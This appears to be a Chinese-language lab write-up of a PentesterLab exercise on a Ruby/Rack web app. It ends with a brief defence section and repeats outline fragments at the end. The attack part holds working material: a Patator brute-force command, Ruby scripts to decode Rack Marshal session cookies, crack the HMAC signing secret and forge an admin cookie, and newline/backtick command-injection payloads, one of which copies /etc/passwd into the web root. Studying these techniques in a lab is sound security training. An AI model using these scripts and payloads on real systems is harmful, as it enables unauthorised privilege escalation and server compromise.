Cookie篡改与命令注入技术详解<\/h1>

1. 概述<\/h2>
本文详细讲解在Ruby\/Rack框架环境中利用Cookie篡改进行权限提升，以及后续的命令注入攻击技术。这两种技术结合使用可以构成完整的攻击链，从普通用户权限提升到管理员权限，最终获取服务器控制权。<\/p>

2. 环境准备<\/h2>

2.1 测试环境搭建<\/h3>

下载测试环境：https:\/\/pentesterlab.com\/exercises\/rack_cookies_and_commands_injection<\/li>

环境特点：基于Ruby\/Rack框架的Web应用，使用Phusion Passenger 3.0.12运行在Debian服务器上<\/li> <\/ul>

2.2 工具准备<\/h3>

Burp Suite：用于HTTP流量分析<\/li>
Patator：多协议暴力破解工具<\/li>
Ruby环境：用于解码和修改Cookie<\/li>

Netcat\/Telnet：端口扫描<\/li> <\/ul>

3. 攻击流程<\/h2>

3.1 指纹识别<\/h3>

使用Burp Suite抓包分析HTTP头信息：<\/p>

服务器：Apache 2.2.16<\/li>
应用服务器：Phusion Passenger 3.0.12<\/li>
操作系统：Debian<\/li>
重定向行为：HTTP 302响应<\/li> <\/ul> <\/li>

端口扫描：<\/p>

nc -zv 目标IP 1-1000
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 暴力破解登录<\/h3>
当SQL注入尝试失败时，采用暴力破解：<\/p>


使用Patator进行暴力破解：<\/p>
patator http_fuzz url=<\/span>http:\/\/目标地址\/login method=<\/span>POST body=<\/span>'login=FILE0&password=FILE0'<\/span> 0=<\/span>~\/123.txt accept_cookie=<\/span>1<\/span> follow=<\/span>1<\/span> -x ignore:fgrep=<\/span>'DNS Manager Login'<\/span> -l \/tmp\/
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

http_fuzz<\/code>：使用HTTP暴力破解模块<\/li>
url=<\/code>：目标URL<\/li>
method=POST<\/code>：使用POST方法<\/li>
body=<\/code>：请求体内容<\/li>
accept_cookie=1<\/code>：接受服务器返回的Cookie<\/li>
follow=1<\/code>：跟随重定向<\/li>
-x ignore:fgrep='DNS Manager Login'<\/code>：忽略包含特定文本的响应<\/li>
<\/ul>
<\/li>
<\/ol>
3.3 Cookie篡改提权<\/h3>
3.3.1 Cookie分析<\/h4>
成功登录后，服务器返回rack.session<\/code> Cookie，有两种形式：<\/p>

简单字符串形式<\/li>
字符串和签名分隔形式（使用--<\/code>分隔）<\/li>
<\/ol>
3.3.2 Cookie解码<\/h4>
Rack Cookie编码过程：<\/p>

使用Ruby的Marshal.dump<\/code>序列化对象<\/li>
结果使用Base64编码<\/li>
进行URL编码<\/li>
<\/ol>
解码步骤：<\/p>

提取Cookie值（去除名称、选项和签名）<\/li>
URL解码和Base64解码<\/li>
使用Marshal.load<\/code>加载对象<\/li>
<\/ol>
解码Ruby脚本：<\/p>
#encoding: utf-8<\/span>
<\/span><\/span>require "net\/http"<\/span>
<\/span><\/span>require "uri"<\/span>
<\/span><\/span>require 'pp'<\/span>
<\/span><\/span>require 'base64'<\/span>
<\/span><\/span>require 'data_mapper'<\/span>
<\/span><\/span>
<\/span><\/span>class<\/span> User<\/span> 
<\/span><\/span>  attr_accessor<\/span> :admin<\/span>  # 添加此行以访问admin属性<\/span>
<\/span><\/span>end<\/span>
<\/span><\/span>
<\/span><\/span># 远程主机配置<\/span>
<\/span><\/span>DataMapper<\/span>.<\/span>setup(:default<\/span>,'sqlite3::memory'<\/span>)
<\/span><\/span>URL<\/span> =<\/span> "http:\/\/目标地址\/login"<\/span>
<\/span><\/span>
<\/span><\/span># 创建URL对象<\/span>
<\/span><\/span>url =<\/span> URI<\/span>.<\/span>parse(URL<\/span>)
<\/span><\/span>creds =<\/span> "test"<\/span>  # 使用爆破得到的凭证<\/span>
<\/span><\/span>
<\/span><\/span># 认证<\/span>
<\/span><\/span>resp =<\/span> Net<\/span>::<\/span>HTTP<\/span>.<\/span>start(url.<\/span>host, url.<\/span>port) do<\/span> |<\/span>http|<\/span>
<\/span><\/span>  http.<\/span>post(url.<\/span>request_uri, "login=<\/span>#{<\/span>creds}<\/span>&password=<\/span>#{<\/span>creds}<\/span>"<\/span>)
<\/span><\/span>end<\/span>
<\/span><\/span>
<\/span><\/span># 获取Cookie<\/span>
<\/span><\/span>c =<\/span> resp.<\/span>header[<\/span>'Set-Cookie'<\/span>].<\/span>split("="<\/span>)[<\/span>1<\/span>].<\/span>split("; "<\/span>)[<\/span>0<\/span>]<\/span>
<\/span><\/span>cookie, signature =<\/span> c.<\/span>split("--"<\/span>)
<\/span><\/span>decoded =<\/span> Base64<\/span>.<\/span>decode64(URI<\/span>.<\/span>decode(cookie))
<\/span><\/span>
<\/span><\/span>begin<\/span>
<\/span><\/span>  # 加载对象<\/span>
<\/span><\/span>  object =<\/span> Marshal<\/span>.<\/span>load(decoded)
<\/span><\/span>  pp object
<\/span><\/span>rescue<\/span> ArgumentError<\/span> =><\/span> e
<\/span><\/span>  puts "ERROR: "<\/span>+<\/span>e.<\/span>to_s
<\/span><\/span>end<\/span>
<\/span><\/span><\/code><\/pre>3.3.3 篡改Cookie<\/h4>


对于未签名的Cookie：<\/p>

解码后直接修改admin属性<\/li>
重新编码：
object[<\/span>"user"<\/span>].<\/span>admin =<\/span> true<\/span>
<\/span><\/span>nc =<\/span> Base64<\/span>.<\/span>encode64(Marshal<\/span>.<\/span>dump(object))
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

对于签名的Cookie：<\/p>

需要找到签名密钥<\/li>
使用以下方法生成HMAC签名：
def<\/span> generate_hmac<\/span>(data, secret)
<\/span><\/span>  OpenSSL<\/span>::<\/span>HMAC<\/span>.<\/span>hexdigest(OpenSSL<\/span>::<\/span>Digest<\/span>::<\/span>SHA1<\/span>.<\/span>new, secret, data)
<\/span><\/span>end<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
暴力破解签名密钥的脚本：<\/p>
require 'openssl'<\/span>
<\/span><\/span>require 'uri'<\/span>
<\/span><\/span>require 'pp'<\/span>
<\/span><\/span>
<\/span><\/span>COOKIES<\/span>=<\/span> "获取到的完整Cookie值"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> sign<\/span>(data, secret)
<\/span><\/span>  OpenSSL<\/span>::<\/span>HMAC<\/span>.<\/span>hexdigest(OpenSSL<\/span>::<\/span>Digest<\/span>::<\/span>SHA1<\/span>.<\/span>new, secret, data)
<\/span><\/span>end<\/span>
<\/span><\/span>
<\/span><\/span>value, signed =<\/span> COOKIES<\/span>.<\/span>split("--"<\/span>,2<\/span>)
<\/span><\/span>value =<\/span> URI<\/span>.<\/span>decode(value)
<\/span><\/span>
<\/span><\/span>File<\/span>.<\/span>readlines(ARGV<\/span>[<\/span>0<\/span>]<\/span>).<\/span>each do<\/span> |<\/span>c|<\/span>
<\/span><\/span>  c.<\/span>chomp!
<\/span><\/span>  if<\/span> sign(value, c) ==<\/span> signed
<\/span><\/span>    puts "Secret found: "<\/span>+<\/span>c
<\/span><\/span>    exit
<\/span><\/span>  end<\/span>
<\/span><\/span>end<\/span>
<\/span><\/span><\/code><\/pre><\/li>

重新签名并提交篡改后的Cookie：<\/p>
object[<\/span>"user"<\/span>].<\/span>admin =<\/span> true<\/span>
<\/span><\/span>nc =<\/span> Base64<\/span>.<\/span>encode64(Marshal<\/span>.<\/span>dump(object))
<\/span><\/span>ns =<\/span> OpenSSL<\/span>::<\/span>HMAC<\/span>.<\/span>hexdigest(OpenSSL<\/span>::<\/span>Digest<\/span>::<\/span>SHA1<\/span>.<\/span>new, "secret"<\/span>, nc)
<\/span><\/span>newcookie =<\/span> URI<\/span>.<\/span>encode(nc).<\/span>gsub("="<\/span>,"%3D"<\/span>)+<\/span>"--"<\/span>+<\/span>ns
<\/span><\/span>
<\/span><\/span>resp =<\/span> Net<\/span>::<\/span>HTTP<\/span>.<\/span>start(url.<\/span>host, url.<\/span>port) do<\/span> |<\/span>http|<\/span>
<\/span><\/span>  http.<\/span>get("\/"<\/span>, {"Cookie"<\/span> =><\/span> "rack.session="<\/span>+<\/span>newcookie })
<\/span><\/span>  puts resp.<\/span>body
<\/span><\/span>end<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.4 命令注入<\/h3>
3.4.1 识别注入点<\/h4>
在管理员界面中寻找使用系统命令的功能点，特别是参数直接传递给系统命令的地方。<\/p>
3.4.2 注入技术<\/h4>


基本注入方法：<\/p>

使用反引号 `command`<\/code><\/li>
使用管道符 |<\/code>、&<\/code> 或 ;<\/code> 分隔命令<\/li>
<\/ul>
<\/li>

测试注入：<\/p>
ping -c 4<\/span> 127.0.0.1  # 测试延迟<\/span>
<\/span><\/span>sleep 5<\/span>              # 测试时间延迟<\/span>
<\/span><\/span><\/code><\/pre><\/li>

实际注入示例：<\/p>
id=1&name=webmail&ip=127.0.0.1%0a`pwd`&ttl=600
<\/code><\/pre>
Ruby正则表达式的多行特性使得%0a<\/code>（换行符）可以绕过一些过滤。<\/p>
<\/li>
<\/ol>
3.4.3 获取命令输出<\/h4>
当直接输出被限制时，可以采用以下方法：<\/p>


将结果写入Web可访问目录：<\/p>
id=1&name=webmail&ip=127.0.0.1%0a`cp \/etc\/passwd \/var\/www\/public\/`&ttl=600
<\/code><\/pre>
然后访问：http:\/\/目标地址\/passwd<\/p>
<\/li>

分步获取输出：<\/p>

使用ls | grep -v Gemfile<\/code>等命令逐步获取目录内容<\/li>
注意参数长度限制<\/li>
<\/ul>
<\/li>
<\/ol>
4. 防御措施<\/h2>
4.1 防止Cookie篡改<\/h3>

使用强密钥签名Cookie<\/li>
避免在Cookie中存储敏感信息<\/li>
定期轮换签名密钥<\/li>
对Cookie设置HttpOnly和Secure标志<\/li>
<\/ol>
4.2 防止命令注入<\/h3>

避免直接使用用户输入构造系统命令<\/li>
使用白名单验证输入<\/li>
对特殊字符进行严格过滤<\/li>
使用安全的API替代系统命令调用<\/li>
实施最小权限原则，限制Web服务器用户权限<\/li>
<\/ol>
5. 总结<\/h2>
本文详细介绍了在Ruby\/Rack环境中：<\/p>

通过分析Cookie结构实现权限提升<\/li>
利用Ruby的序列化机制篡改会话数据<\/li>
通过命令注入获取系统控制权<\/li>
完整的攻击链技术实现<\/li>
<\/ol>
这些技术突显了Web应用中会话管理和输入验证的重要性，开发人员应实施多层防御来防止此类攻击。<\/p>

Cookie篡改与命令注入技术详解<\/h1>

1. 概述<\/h2> 本文详细讲解在Ruby\/Rack框架环境中利用Cookie篡改进行权限提升，以及后续的命令注入攻击技术。这两种技术结合使用可以构成完整的攻击链，从普通用户权限提升到管理员权限，最终获取服务器控制权。<\/p>

2. 环境准备<\/h2>

3. 攻击流程<\/h2>

3.3 Cookie篡改提权<\/h3>

3.4 命令注入<\/h3>

3.4.1 识别注入点<\/h4> 在管理员界面中寻找使用系统命令的功能点，特别是参数直接传递给系统命令的地方。<\/p>

4. 防御措施<\/h2>

1. 概述<\/h2>
本文详细讲解在Ruby\/Rack框架环境中利用Cookie篡改进行权限提升，以及后续的命令注入攻击技术。这两种技术结合使用可以构成完整的攻击链，从普通用户权限提升到管理员权限，最终获取服务器控制权。<\/p>

3.4.1 识别注入点<\/h4>
在管理员界面中寻找使用系统命令的功能点，特别是参数直接传递给系统命令的地方。<\/p>